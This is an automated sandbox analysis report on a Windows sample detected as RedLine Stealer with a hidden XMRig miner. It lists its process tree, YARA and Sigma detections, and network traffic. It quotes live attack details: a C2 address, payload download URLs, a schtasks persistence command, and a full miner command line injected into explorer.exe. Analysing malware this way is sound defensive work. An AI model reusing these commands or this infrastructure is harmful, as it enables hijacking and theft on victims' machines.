Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe

Overview

General Information

Sample Name:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Analysis ID:553228
MD5:c7f9efb09db59923b3f96fd1ef2f0873
SHA1:43ee2579fef8ff0c3a5d53f3dc4306bbdf04d484
SHA256:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001dd491ac614fdef1fa149
Tags:CoinMinerXMRigexe
Infos:

Most interesting Screenshot:

Detection

BitCoin Miner RedLine Redline Clipper SilentXMRMiner Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Redline Clipper
Yara detected SilentXMRMiner
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Yara detected BitCoin Miner
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Uses known network protocols on non-standard ports
Detected Stratum mining protocol
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Sigma detected: Suspicius Add Task From User AppData Temp
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Creates driver files
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe" MD5: C7F9EFB09DB59923B3F96FD1EF2F0873)
    • AppLaunch.exe (PID: 5180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • sistem.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\sistem.exe" MD5: 14A6FC2FF495BE7077B8AA7602606BB7)
        • AppLaunch.exe (PID: 7016 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • Microsoft.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft.exe" MD5: AFA47609E27DB892A6E3597A88C5645A)
        • conhost.exe (PID: 2188 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6036 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 6380 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • cmd.exe (PID: 6696 cmdline: cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • services64.exe (PID: 864 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: AFA47609E27DB892A6E3597A88C5645A)
              • conhost.exe (PID: 6840 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                • cmd.exe (PID: 4608 cmdline: cmd" cmd /c taskkill /f /PID "6040 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                  • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                  • taskkill.exe (PID: 6532 cmdline: taskkill /f /PID "6040" MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
                • explorer.exe (PID: 4876 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • services64.exe (PID: 6688 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: AFA47609E27DB892A6E3597A88C5645A)
    • conhost.exe (PID: 6012 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sihost64.exe (PID: 6288 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" MD5: A5D983222C60F4DCAE743F8E34806580)
        • conhost.exe (PID: 6040 cmdline: C:\Windows\System32\conhost.exe" "/sihost64 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6924 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "95.143.179.185:31334"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 124 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                9.2.AppLaunch.exe.400000.0.unpackJoeSecurity_RedlineClipperYara detected Redline ClipperJoe Security
                  27.0.explorer.exe.140000000.6.unpackPUA_WIN_XMRIG_CryptoCoin_Miner_Dec20Detects XMRIG crypto coin minersFlorian Roth
                  • 0x4d6674:$x1: xmrig.exe
                  • 0x4d6560:$x2: xmrig.com
                  • 0x4d6638:$x2: xmrig.com
                  27.0.explorer.exe.140000000.6.unpackPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
                  • 0x457915:$s01: --cpu-priority=
                  • 0x45726d:$s05: --nicehash
                  27.0.explorer.exe.140000000.6.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                  • 0x4617f1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                  Click to see the 227 entries

                  Sigma Overview

                  Bitcoin Miner:

                  barindex
                  Sigma detected: XmrigShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6840, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , ProcessId: 4876

                  System Summary:

                  barindex
                  Sigma detected: Suspicius Add Task From User AppData TempShow sources
                  Source: Process startedAuthor: frack113: Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6036, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 6380

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeAvira: detection malicious, Label: HEUR/AGEN.1145980
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeAvira: detection malicious, Label: HEUR/AGEN.1145980
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeAvira: detection malicious, Label: HEUR/AGEN.1145980
                  Found malware configurationShow sources
                  Source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmpMalware Configuration Extractor: RedLine {"C2 url": "95.143.179.185:31334"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeVirustotal: Detection: 34%Perma Link
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeVirustotal: Detection: 52%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeVirustotal: Detection: 52%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMetadefender: Detection: 31%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeReversingLabs: Detection: 75%
                  Machine Learning detection for sampleShow sources
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeJoe Sandbox ML: detected

                  Bitcoin Miner:

                  barindex
                  Yara detected SilentXMRMinerShow sources
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
                  Yara detected BitCoin MinerShow sources
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
                  Yara detected Xmrig cryptocurrency minerShow sources
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.821033223.0000020180001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.801221568.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.796871079.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.804927838.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.918136554.00000000004BA000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.814593137.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.917920684.000000000130B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.794400216.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.812542531.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4876, type: MEMORYSTR
                  Found strings related to Crypto-MiningShow sources
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: cryptonight/0
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Detected Stratum mining protocolShow sources
                  Source: global trafficTCP traffic: 192.168.2.4:49816 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49822 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp

                  Networking:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\explorer.exeDomain query: mine.bmpool.org
                  Source: C:\Windows\explorer.exeNetwork Connect: 157.90.156.89 116Jump to behavior
                  Uses known network protocols on non-standard portsShow sources
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49779
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777
